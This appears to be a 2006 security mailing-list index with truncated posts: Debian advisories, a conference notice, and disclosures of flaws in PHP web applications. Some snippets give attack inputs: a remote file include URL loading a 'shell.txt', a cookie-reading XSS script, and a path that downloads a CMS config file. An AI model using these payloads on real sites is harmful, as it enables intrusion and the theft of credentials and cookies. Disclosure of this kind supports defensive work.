[SECURITY] [DSA 1173-1] New openssl packages fix RSA signature forgery cryptographic weakness
2006-09-10 Moritz Muehlenhoff (jmm debian org)

PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit]
2006-09-09 ali hackerz ir
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
remote file include :
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart =[shell.txt?]
xss:
http://www.domain.com/PhpLinkExchange/user_add.php?m

Re: [Full-disclosure] Re: RSA SecurID SID800 Token vulnerable by design
2006-09-10 Brian Eaton (eaton lists gmail com)
On 9/9/06, Lyal Collins <lyal.collins (at) key2it.com (dot) au> wrote:
> If there's malware on the machine, and there is a connected USB token, then
> authentication is only as good as the password - malware can probe the
> connected token as often as desired.
<snip>
> In theory, with trusted data paths everyw

HotPlug CMS Config File Include Vulnerability
2006-09-11 security soqor net
Hello
HotPlug CMS Config File Include Vulnerability
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security (at) soqor (dot) net
After Script Url Add includes/class/config.inc
And you will download the config file ,, so that you will be able to connect by r

PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
2006-09-10 l0x3 hotmail com
+--------------------------------------------------------------------
+
+ ppalCart V(2.5 EE) Remote File Inclusion
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: ppalCart 2.5 EE
+ Venedor ...........: ht

Open Bulletin Board <= 1.0.8 (root_path) File Include Vulnerability
2006-09-10 l0x3 hotmail com
+--------------------------------------------------------------------
+
+ Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: Open Bulletin

PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
2006-09-10 l0x3 hotmail com
+--------------------------------------------------------------------
+
+ PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: PHP Ad

[SECURITY] [DSA 1174-1] New openssl096 packages fix RSA signature forgery cryptographic weakness
2006-09-11 Moritz Muehlenhoff (jmm debian org)

XHP CMS v0.5.1 Vuls Xss and Full path vuls
2006-09-11 security soqor net
Hello,,
XHP CMS v0.5.1 Vuls
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net
Xss
index.php?errcode=<script>alert(document.cookie);</script>
Full path
action.php?action=1&module=engine

Web Server Creator v0.1 (l) Remote Include Vulnerability
2006-09-08 x0r0n hotmail com
###########################################################
#Web Server Creator v0.1 (l) Remote Include Vulnerability
############################################################
#Author: XORON
############################################################
#URL: http://www.comscripts.co

PUMA 1.0 RC 2 (config.php) Remote File Inclusion
2006-09-10 philipp niedziela gmx de
+--------------------------------------------------------------------
+
+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_RFI.htm
+
+-----------------------------------------------------------

[SECURITY] [DSA 1159-2] New Mozilla Thunderbird packages fix several problems
2006-09-08 joey infodrom org (Martin Schulze)

Vikingboard 0.1b Multiple Vulnerabilities
2006-09-08 no-replay Hessamx net
================================================
:: Vikingboard 0.1b Multiple Vulnerabilities ::
================================================
Software : Vikingboard
Website : http://www.vikingboard.com/
Discover : Hessam-x / www.hessamx.net
I. Cross Site Scripting Vulnerabilities
---

ConSec Symposium - Sept 20-22 in Austin, TX
2006-09-08 Michael Allgeier (Michael Allgeier lcra org)
September 20-22
Austin, Texas
http://www.consec.org
ConSec, the Southwest Regional Symposium on Business Continuity, Information Security & IT Audit. This Symposium is celebrating 10 years running. Events in the last few years have heightened the need for and understanding of these topics. There ar
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 1173-1                    security (at) debian (dot) org
http://www.debian.org/security/ Noah Meyerhans
September 10th, 2006